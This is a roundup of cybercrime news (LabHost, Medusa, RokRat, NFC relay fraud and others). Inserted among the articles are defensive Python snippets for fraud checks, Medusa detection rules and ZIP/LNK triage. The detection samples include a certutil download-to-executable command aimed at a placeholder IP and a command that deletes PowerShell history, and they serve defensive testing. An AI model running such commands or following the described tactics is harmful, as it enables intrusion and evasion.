
Global Cybercrime Crackdown Dismantles Major Phishing-as-a-Service Platform ‘LabHost’


In a major international crackdown, a law enforcement operation spearheaded by the London Metropolitan Police and coordinated by Europol has successfully taken down LabHost, one of the most notorious phishing-as-a-service (PhaaS) platforms used by cybercriminals worldwide.

Between April 14 and April 17, 2024, authorities carried out synchronized raids across 70 different sites globally, resulting in the arrest of 37 individuals. Among those arrested were four suspects in the UK believed to be the platform’s original creators and administrators. Following the arrests, LabHost’s digital infrastructure was completely dismantled.

LabHost had gained infamy for its ease of use and wide accessibility, making it a go-to cybercrime tool. The service offered more than 170 fake website templates imitating trusted brands from the banking, telecom, and logistics sectors—allowing users to craft convincing phishing campaigns with minimal effort.

According to authorities, LabHost supported over 40,000 phishing domains and catered to approximately 10,000 users across the globe. The coordinated enforcement effort was supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), with 19 countries actively participating in the investigation.

LabHost showcased how cybercrime has become industrialized through subscription-based platforms. For a monthly fee of around $249, subscribers could access phishing kits, fraudulent websites, hosting services, and even tools to interact with victims in real-time.

One of its most dangerous features was LabRat, an integrated dashboard that enabled users to monitor ongoing phishing attacks. This tool also allowed cybercriminals to intercept two-factor authentication codes and login credentials, effectively bypassing modern security measures.

Its user-friendly interface eliminated the need for technical skills—opening the door for anyone with malicious intent and a credit card to launch sophisticated phishing schemes. The platform's popularity contributed to a spike in identity theft, financial fraud, and widespread data breaches.

Authorities hailed the takedown as a milestone in the fight against cybercrime. However, they also cautioned that the commoditization of cybercrime remains a serious concern.

"This is a critical blow to phishing infrastructure," cybersecurity experts said, "but the ease of recreating similar platforms continues to pose a major threat."

Following the seizure of LabHost’s backend systems, law enforcement agencies have begun analyzing the data to identify the perpetrators and their victims. This will mark the beginning of a new wave of investigations and preventative measures.

The operation involved agencies from 19 countries, including the FBI and Secret Service from the United States, as well as cybercrime units in Canada, Germany, the Netherlands, Poland, Spain, Australia, and the UK. This unprecedented level of international cooperation highlights the cross-border nature of cyber threats and the importance of unified global action.

As authorities prepare for a fresh wave of prosecutions, the LabHost takedown stands as a defining moment in cyber law enforcement—both in its impact and its symbolism.

Pakistan State-sponsored Hackers Attack Indian Websites, Attempts Blocked

Pakistan's cyber warfare against India

Recently, Pakistan state-sponsored hacker groups launched multiple unsuccessful attempts to hack Indian websites, part of a continuing wave of cyber offensives against India after the Pahalgam terror attack. These breach attempts were promptly identified and blocked by Indian cybersecurity agencies.

In one incident, the hacking groups “Cyber Group HOAX1337” and “National Cyber Crew” attacked the website of the Army Public School in Jammu (in the Indian union territory of Jammu and Kashmir), attempting to deface the site with messages mocking the recent victims of the Pahalgam terror attack.

State-sponsored attacks against Indian websites

In another cyberattack, hackers defaced the website of a healthcare service for ex-servicemen; the sites of Indian Air Force veterans and the Army Institute of Hotel Management were also attacked.

Besides Army-related websites, Pakistan-sponsored hackers have repeatedly tried to break into websites associated with veterans, children, and civilians, officials said.

Additionally, the Maharashtra Cyber Department deflected more than 10 lakh cyberattacks on Indian systems by hacking gangs from various countries after the April 22 terror attack on tourists in Pahalgam.

Rise of targeted cyberattacks against India

A Maharashtra Cyber senior police official said that the state’s police cybercrime detection wing has noticed a sudden rise in digital attacks after the Kashmir terror strike.

Experts suspect these cyber attacks are part of a deliberate campaign to intensify tensions on digital platforms. These attempts are seen as part of Pakistan’s broader hybrid warfare plan, which has a history of using terrorism and information warfare against India. 

Besides Pakistan, cyberattacks have also surfaced from Indonesia, Morocco, and the Middle East. Many of the hacker groups have claimed links to Islamist ideologies, suggesting a coordinated cyber warfare operation, according to the police official.

‘Elusive Comet’ Hackers Exploit Zoom to Target Crypto Users in Sophisticated Scam


A newly identified hacking group known as Elusive Comet is targeting cryptocurrency users through a deceptive campaign that leverages Zoom’s remote control feature to gain unauthorized access to victims' systems.

The remote control tool, built into Zoom, enables meeting participants to take control of another person's computer — a capability now being manipulated by cybercriminals to bypass technical defenses through social engineering rather than traditional code exploitation.

According to a report from cybersecurity firm Trail of Bits, the group’s tactics closely resemble those used in the $1.5 billion Bybit crypto heist believed to be linked to the Lazarus group.

"The ELUSIVE COMET methodology mirrors the techniques behind the recent $1.5 billion Bybit hack in February, where attackers manipulated legitimate workflows rather than exploiting code vulnerabilities," explains the Trail of Bits report.

Trail of Bits uncovered the campaign when attackers attempted to target their CEO via a direct message on X (formerly Twitter), posing as representatives of Bloomberg Crypto.

The ruse begins with a fraudulent invitation to a "Bloomberg Crypto" interview, sent to high-profile individuals either through email (bloombergconferences[@]gmail.com) or social media. The attackers use sock-puppet accounts, mimicking journalists or crypto media outlets, and send Calendly links to schedule the meeting.

Because both Calendly and Zoom links are genuine, the setup appears trustworthy to the victims. During the meeting, the attackers launch a screen-sharing session and issue a remote control request — with a crucial twist: their Zoom display name is changed to “Zoom.”

This results in a misleading prompt that reads "Zoom is requesting remote control of your screen," tricking the target into thinking the request comes from the app itself.

Granting access allows the attacker full remote control, enabling data theft, malware installation, unauthorized file access, or even the initiation of crypto transactions. In some cases, attackers establish persistence through hidden backdoors, remaining unnoticed even after disconnecting.

"What makes this attack particularly dangerous is the permission dialog's similarity to other harmless Zoom notifications," says Trail of Bits.
"Users habituated to clicking 'Approve' on Zoom prompts may grant complete control of their computer without realizing the implications."

To guard against such threats, Trail of Bits recommends the use of Privacy Preferences Policy Control (PPPC) profiles to restrict system accessibility permissions. For highly sensitive environments — particularly those handling digital assets or crypto transactions — the firm advises removing the Zoom desktop client entirely.

"For organizations handling particularly sensitive data or cryptocurrency transactions, the risk reduction from eliminating the Zoom client entirely often outweighs the minor inconvenience of using browser-based alternatives," explains Trail of Bits.

SuperCard X Malware Turns Android Phones into NFC Relay Hubs for Real-Time Payment Fraud


Hackers are exploiting a Chinese-language malware-as-a-service (MaaS) platform known as SuperCard X to conduct near-field communication (NFC) relay attacks, enabling the theft of payment card data and real-time fraudulent transactions at point-of-sale (PoS) systems and ATMs. According to mobile security firm Cleafy, SuperCard X diverges from traditional banking malware by weaponizing the contactless features of modern payment cards, transforming infected Android devices into relay tools for instant cash-outs.

“Effectively turning any infected Android handset into an NFC relay station,” said mobile security firm Cleafy.

Cybercriminals can access preconfigured Reader and Tapper apps—used to capture and relay NFC card data—via Telegram channels, offering low-barrier entry into NFC fraud without the need to build custom tools.

The attack typically begins with spoofed messages sent via SMS or WhatsApp, impersonating a bank and warning of suspicious activity. Victims are urged to call a provided number, where scammers—posing as bank representatives—manipulate them into disabling card security settings through social engineering. Eventually, victims are sent a link to download the SuperCard X Reader, disguised as a legitimate security utility.

Once installed, the Reader app requests minimal NFC and system permissions, allowing it to evade standard antivirus detection. Cleafy’s research identified that SuperCard X reuses code from NFCGate and NGate, open-source frameworks that facilitate NFC relay functionalities.

Victims are tricked into tapping their payment cards against the infected Android device. This initiates silent harvesting of sensitive NFC data—such as Answer To Reset (ATR) messages—which are then transmitted via a secure HTTP-based command-and-control (C2) infrastructure, protected through mutual TLS encryption.

On the attacker’s side, the Tapper app—running on a separate Android phone—emulates the victim’s card using Host-based Card Emulation (HCE) mode. This allows the attacker to make contactless transactions at PoS terminals and ATMs, treating the emulated card as legitimate, especially after the victim has removed spending limits.

“SuperCard X distinguishes itself from conventional Android banking Trojans by omitting complex features such as screen overlays, SMS interception or remote desktop controls. It instead focuses on an NFC relay and streamlined permission model, granting it a low fingerprinting profile and allowing it to remain undetected by the vast majority of antivirus engines and behavioral monitors.”

In certain campaigns targeting users in Italy, Cleafy observed customized app versions distributed by affiliates. These variants had stripped-down interfaces—removing sign-up screens and Telegram links—and replaced them with benign app icons and names. During calls, fraudsters provide victims with pre-set credentials, eliminating the need for registration and further reducing the chance of user suspicion.

Pune Company Falls Victim to ₹6.49 Crore Cyber Fraud in Major Man-in-the-Middle Attack


A 39-year-old director of a Mohammedwadi-based firm, which operates in IT services and dry fruit imports, was duped into transferring ₹6.49 crore following a sophisticated Man-in-the-Middle (MitM) cyberattack on March 27. In a MitM scam, cybercriminals secretly intercept communications between two parties, impersonating one to deceive the other, often stealing sensitive information or funds.

According to investigators, the company director was at his residence near NIBM Road when he received what appeared to be a legitimate payment request via email from a business associate. Trusting the authenticity, he initiated the payment and even instructed his bank to process it. However, when he later contacted the exporter to confirm receipt, they denied getting any money.

Upon closer inspection, the director discovered subtle changes in the sender's email ID and bank account details — just one letter altered in the email address and a different bank account number. These minor discrepancies went unnoticed initially, police said.
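The one-letter change in the sender address and the swapped account number described above are exactly what a vendor-master check catches before money moves. The following is an added example, not code from the article or the police: it assumes a constructed vendor record (VENDOR_MASTER, with made-up e-mail and account values) and a hypothetical check_payment_request helper.

```python
import re

# Constructed vendor-master record (not real data): the exporter's e-mail address
# and bank account as verified out of band when the relationship was set up.
VENDOR_MASTER = {
    "almond-exporter": {
        "email": "accounts@sunvalleyalmonds.example",
        "account": "021000021-883412907",
    },
}


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings; a distance of 1 is one letter swapped,
    added or dropped, which is exactly the kind of change this fraud relied on."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def check_payment_request(vendor_id: str, sender_email: str, account_number: str) -> list:
    """Compare a payment request against the vendor master.

    Returns a list of human-readable findings; an empty list means both the
    sender address and the bank account match what is on file."""
    record = VENDOR_MASTER[vendor_id]
    findings = []
    sender, known = sender_email.strip().lower(), record["email"].lower()
    if sender != known:
        dist = levenshtein(sender, known)
        if dist <= 2:
            findings.append(f"sender {sender!r} is a near-match to the address on file "
                            f"(edit distance {dist}); likely lookalike")
        else:
            findings.append(f"sender {sender!r} is not the vendor's address on file")
    # Compare digits only so formatting differences (dashes, spaces) cannot hide a change.
    if re.sub(r"\D", "", account_number) != re.sub(r"\D", "", record["account"]):
        findings.append("bank account differs from the vendor master; confirm by phone "
                        "on a number already on file, not one taken from the e-mail")
    return findings


if __name__ == "__main__":
    # One 'l' dropped from the domain plus a different account: both should be flagged.
    for finding in check_payment_request("almond-exporter",
                                         "accounts@sunvaleyalmonds.example",
                                         "021000021-990012345"):
        print("HOLD:", finding)
```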

Senior Inspector Swapnali Shinde of the Cyber Police told TOI, "It has two divisions, one for IT services and another for importing dry fruits. The company director would import the dry fruits from different countries, including the United States and those in the Middle-East. On March 27, he received a payment request from an exporter of dry fruits based in the US. The email demanded payment of nearly Rs 6.5 crore. The victim, thinking it was for the almonds he'd recently imported, initiated the transaction."

Realizing the fraud only on April 17, the director registered an FIR with Pune's cyber police on April 23.

Shinde added, "Officials from his bank called him to verify the transaction, but he told them to proceed. The amount was sent across in five transactions," explaining that the online ledger displayed only the first few letters of the firm's name and bank details.

"The victim did not realise that the account number of the company, with whom he had regular business, was changed. He just clicked on the button and initiated the transactions," Shinde said.

Cyber investigators are now tracing the trail of the siphoned funds. "The cash went to several accounts. We're still trying to establish a trail. As of now we can say that about Rs 3 crore is yet to reach the suspects. We will try our best to salvage the money," Shinde stated.

Authorities Warn Against Medusa Ransomware Surge

Federal agencies are urging individuals and organizations to stay vigilant against a rising ransomware threat that has affected hundreds of new victims in recent weeks. The FBI, Cybersecurity and Infrastructure Security Agency (CISA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have jointly issued an advisory detailing the tactics used by Medusa ransomware and how to mitigate its impact.

First identified in June 2021, Medusa is a ransomware-as-a-service (RaaS) variant that primarily targets critical infrastructure sectors, including healthcare, education, legal, insurance, technology, and manufacturing. Through the RaaS model, the ransomware's developers delegate attack execution to affiliates, who have collectively compromised over 300 victims in the past month alone.

Initially, Medusa operated as a closed ransomware variant, where the same group that developed the malware also carried out attacks. However, it has since evolved into an affiliate-driven model, with developers recruiting attackers from dark web forums and paying them between $100 and $1 million per job.

Cybercriminals behind Medusa employ two primary attack vectors:
  • Phishing campaigns – Fraudulent emails trick users into downloading malicious attachments or clicking harmful links.
  • Exploiting unpatched vulnerabilities – Attackers take advantage of outdated software to infiltrate company networks.

Once inside, they utilize various legitimate tools to expand their access:

  • Advanced IP Scanner and SoftPerfect Network Scanner – Used to detect exploitable network vulnerabilities.
  • PowerShell and Windows command prompt – Help compile lists of targeted network resources.
  • Remote access tools like AnyDesk, Atera, and Splashtop – Assist in lateral movement across the system.
  • PsExec – Enables execution of files and commands with system-level privileges.
To avoid detection, attackers often disable security tools using compromised or signed drivers. They also delete PowerShell history and leverage Certutil to conceal their activity.
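The tooling listed above (network scanners, remote access agents, PsExec, Certutil, clearing PowerShell history) is all legitimate software, so detection rests on command lines and on several of these firing on the same host. The block below is an added example, not from the advisory: it runs simple rules over constructed process-creation events (SAMPLE_EVENTS), and the executable names in RULES are assumptions to adjust for your environment.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One process-creation record (host, user, executable path, command line)."""
    host: str
    user: str
    image: str
    cmdline: str


# Executable names are assumptions: adjust to the binaries seen in your environment.
def _image_is(*names):
    return lambda img, cmd: any(img.endswith("\\" + n) for n in names)


RULES = [
    ("network scanner (Advanced IP Scanner / SoftPerfect)",
     _image_is("advanced_ip_scanner.exe", "netscan.exe")),
    ("remote access tool (AnyDesk / Atera / Splashtop)",
     _image_is("anydesk.exe", "ateraagent.exe", "srserver.exe")),
    ("PsExec remote execution", _image_is("psexec.exe", "psexec64.exe")),
    ("certutil used to download or decode",
     lambda img, cmd: img.endswith("\\certutil.exe")
     and re.search(r"-(urlcache|decode|encode)\b", cmd) is not None),
    ("PowerShell history file removed",
     lambda img, cmd: "consolehost_history.txt" in cmd
     and re.search(r"remove-item|\bdel\b|\brm\b|clear-history", cmd) is not None),
]


def detect(events):
    """Return (host, user, rule name) for every event that matches a rule."""
    hits = []
    for ev in events:
        img, cmd = ev.image.lower(), ev.cmdline.lower()
        hits.extend((ev.host, ev.user, name) for name, pred in RULES if pred(img, cmd))
    return hits


def hosts_with_chain(events, minimum=3):
    """Hosts on which at least `minimum` distinct rules fired. The advisory describes
    these tools being used in sequence, so a cluster on one host outweighs a lone hit."""
    per_host = {}
    for host, _user, rule in detect(events):
        per_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in per_host.items() if len(rules) >= minimum)


# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    Event("WS01", "CORP\\jdoe", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          "WINWORD.EXE /n report.docx"),
    Event("WS01", "CORP\\jdoe", r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.exe"),
    Event("SRV02", "CORP\\svc_backup", r"C:\Users\Public\Tools\Advanced_IP_Scanner.exe",
          "Advanced_IP_Scanner.exe /r:10.0.0.0/24"),
    Event("SRV02", "CORP\\svc_backup", r"C:\Users\Public\Tools\PsExec64.exe",
          r"PsExec64.exe \\FS01 -s cmd /c whoami"),
    Event("SRV02", "CORP\\svc_backup", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe Remove-Item $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT", *hit)
    print("hosts with a tool chain:", hosts_with_chain(SAMPLE_EVENTS))
```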

Like other ransomware strains, Medusa follows a double-extortion strategy: attackers encrypt the victim's data and also threaten to publicly leak the data they stole if the ransom is not paid. Victims typically have 48 hours to respond, after which they may be contacted via phone or email.

A Medusa data leak site displays ransom demands along with a countdown timer. If victims need more time, they can delay the data release by paying $10,000 in cryptocurrency per extra day. Meanwhile, attackers may attempt to sell the stolen data to third parties even before the timer expires.

Federal authorities recommend the following preventative measures to reduce the risk of Medusa attacks:
  • Patch vulnerabilities – Keep all operating systems, software, and firmware updated.
  • Network segmentation – Prevent attackers from moving across connected systems.
  • Traffic filtering – Restrict access to internal services from untrusted sources.
  • Disable unused ports – Close unnecessary entry points to minimize security risks.
  • Backup critical data – Store multiple copies of important files in an isolated location.
  • Enable multifactor authentication (MFA) – Secure all accounts, especially those used for webmail, VPNs, and critical systems.
  • Monitor network activity – Use security tools to detect unusual patterns and alert administrators to potential threats.
By implementing these strategies, organizations can significantly lower their chances of falling victim to Medusa ransomware and other evolving cyber threats.

Cybercrime in 2025: AI-Powered Attacks, Identity Exploits, and the Rise of Nation-State Threats



Cybercrime has evolved beyond traditional hacking, transforming into a highly organized and sophisticated industry. In 2025, cyber adversaries — ranging from financially motivated criminals to nation-state actors—are leveraging AI, identity-based attacks, and cloud exploitation to breach even the most secure organizations. The 2025 CrowdStrike Global Threat Report highlights how cybercriminals now operate like businesses. 

One of the fastest-growing trends is Access-as-a-Service, where initial access brokers infiltrate networks and sell entry points to ransomware groups and other malicious actors. The shift from traditional malware to identity-based attacks is accelerating, with 79% of observed breaches relying on valid credentials and remote administration tools instead of malicious software. Attackers are also moving faster than ever. Breakout times—the speed at which cybercriminals move laterally within a network after breaching it—have hit a record low of just 48 minutes, with the fastest observed attack spreading in just 51 seconds. 

This efficiency is fueled by AI-driven automation, making intrusions more effective and harder to detect. AI has also revolutionized social engineering. AI-generated phishing emails now have a 54% click-through rate, compared to just 12% for human-written ones. Deepfake technology is being used to execute business email compromise scams, such as a $25.6 million fraud involving an AI-generated video. In a more alarming development, North Korean hackers have used AI to create fake LinkedIn profiles and manipulate job interviews, gaining insider access to corporate networks. 

The rise of AI in cybercrime is mirrored by the increasing sophistication of nation-state cyber operations. China, in particular, has expanded its offensive capabilities, with a 150% increase in cyber activity targeting finance, manufacturing, and media sectors. Groups like Vanguard Panda are embedding themselves within critical infrastructure networks, potentially preparing for geopolitical conflicts. 

As traditional perimeter security becomes obsolete, organizations must shift to identity-focused protection strategies. Cybercriminals are exploiting cloud vulnerabilities, leading to a 35% rise in cloud intrusions, while access broker activity has surged by 50%, demonstrating the growing value of stolen credentials. 

To combat these evolving threats, enterprises must adopt new security measures. Continuous identity monitoring, AI-driven threat detection, and cross-domain visibility are now critical. As cyber adversaries continue to innovate, businesses must stay ahead—or risk becoming the next target in this rapidly evolving digital battlefield.

North Korean Hackers Exploit ZIP Files in Sophisticated Cyber Attacks


State-sponsored hacking group APT37 (ScarCruft) is deploying advanced cyber-espionage tactics to infiltrate systems using malicious ZIP files containing LNK shortcuts. These files are typically disguised as documents related to North Korean affairs or trade agreements and are spread through phishing emails.

Once opened, the attack unfolds in multiple stages, leveraging PowerShell scripts and batch files to install the RokRat remote access Trojan (RAT) as the final payload.

The infection starts with carefully crafted phishing emails, often using real information from legitimate websites to enhance credibility. These emails contain malicious ZIP attachments housing LNK files. When executed, the LNK file verifies its directory path, relocating itself to %temp% if necessary.

It then extracts multiple components, including:
  • A decoy HWPX document
  • A batch script (shark.bat)
  • Additional payloads such as caption.dat and elephant.dat

The shark.bat script executes PowerShell commands discreetly, launching the elephant.dat script, which decrypts caption.dat using an XOR key. The decrypted content is then executed in memory, ultimately deploying RokRat.
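A mail gateway or an analyst can triage exactly this kind of lure, an archive bundling a decoy document with an LNK shortcut and a batch script, before anyone opens it. The block below is an added example, not code from the article or any vendor: triage_archive and build_sample_archive are hypothetical helpers, and the archive they inspect is constructed in memory from placeholder bytes.

```python
import io
import zipfile

# Shell link (.lnk) files begin with HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046; checking bytes catches renamed shortcuts too.
LNK_MAGIC = bytes.fromhex("4C000000" "01140200" "00000000" "C0000000" "00000046")
SCRIPT_EXT = {".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta"}
EXEC_EXT = SCRIPT_EXT | {".lnk", ".exe", ".scr"}


def triage_archive(data: bytes):
    """Return (entry name, reason) findings for a ZIP attachment; empty means nothing flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))
            if head == LNK_MAGIC:
                findings.append((name, "Windows shortcut (LNK header) inside a document archive"))
            # Look only at the file name, not any directory prefix inside the archive.
            parts = name.lower().rsplit("/", 1)[-1].split(".")
            last = "." + parts[-1]
            if len(parts) > 2 and last in EXEC_EXT:
                findings.append((name, f"double extension '.{parts[-2]}{last}'"))
            elif last in SCRIPT_EXT:
                findings.append((name, "script file"))
    return findings


def build_sample_archive() -> bytes:
    """Constructed look-alike of the campaign's lure: decoy document, LNK and batch file.
    The contents are placeholder bytes, not the real payloads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("trade_agreement.hwpx", b"PK\x03\x04 placeholder decoy")
        zf.writestr("trade_agreement.hwpx.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("shark.bat", b"@echo off\r\nrem placeholder\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reason in triage_archive(build_sample_archive()):
        print(f"FLAG {entry}: {reason}")
```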

Once active, RokRat collects detailed system information, such as:
  • Operating system version
  • Computer name
  • Logged-in user details
  • Running processes
  • Screenshots of the infected system
The stolen data is then exfiltrated to command-and-control (C2) servers via legitimate cloud services like pCloud, Yandex, and Dropbox, utilizing their APIs to send, download, and delete files while embedding OAuth tokens for stealthy communication.

RokRat also allows attackers to execute remote commands, conduct system reconnaissance, and terminate processes. To avoid detection, it implements anti-analysis techniques, including:
  • Detecting virtual environments via VMware Tools
  • Sandbox detection by creating and deleting temporary files
  • Debugger detection using IsDebuggerPresent
The malware ensures secure communication by encrypting data using XOR and RSA encryption, while C2 commands are received in AES-CBC encrypted form, decrypted locally, and executed on the compromised system. These commands facilitate data collection, file deletion, and malware termination.

By leveraging legitimate cloud services, RokRat seamlessly blends into normal network traffic, making detection more challenging.

“This sophisticated approach highlights the evolving tactics of APT37, as they continue to adapt and expand their operations beyond traditional targets, now focusing on both Windows and Android platforms through phishing campaigns.”

As APT37 refines its cyberattack strategies, organizations must remain vigilant against such persistent threats and enhance their cybersecurity defenses.